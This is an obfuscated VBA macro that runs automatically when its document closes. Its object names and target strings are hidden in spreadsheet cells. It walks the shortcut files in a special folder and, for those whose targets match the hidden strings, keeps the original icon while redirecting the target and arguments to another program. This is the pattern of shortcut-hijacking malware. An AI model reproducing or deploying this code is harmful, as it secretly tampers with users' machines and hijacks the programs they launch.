Sub Auto_Close()
Set UfuyCj = CreateObject(activeSheet.Range("AT59").value)
Set LYTjDqKBQ = CreateObject(activeSheet.Range("AV59").value)
Set OhmFYZ = LYTjDqKBQ.GetFolder(UfuyCj.SpecialFolders(activeSheet.Range("AY59").value))
For Each LXlnryTv In OhmFYZ.Files
If(InStr(Lcase(LXlnryTv), ".lnk")) Then
Set ETCbGnI = UfuyCj.CreateShortcut(UfuyCj.SPecialFolders(activeSheet.Range("AY59").value) & "\" & LXlnryTv.name)
If(InStr(Lcase(ETCbGnI.targetPath), activeSheet.Range("AZ59").value) or InStr(Lcase(ETCbGnI.targetPath), activeSheet.Range("BA59").value) or InStr(Lcase(ETCbGnI.targetPath), activeSheet.Range("BC59").value)) Then
ETCbGnI.IconLocation = ETCbGnI.targetpath
ETCbGnI.arguments = "-w " & activeSheet.Range("BE59").Value & ETCbGnI.targetPath & "'" & activeSheet.Range("BH59").Value
ETCbGnI.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BL59").value
if(Len(ETCbGnI.arguments) < 1023) Then
ETCbGnI.save
end if
end if
end if
next LXlnryTv
End Sub
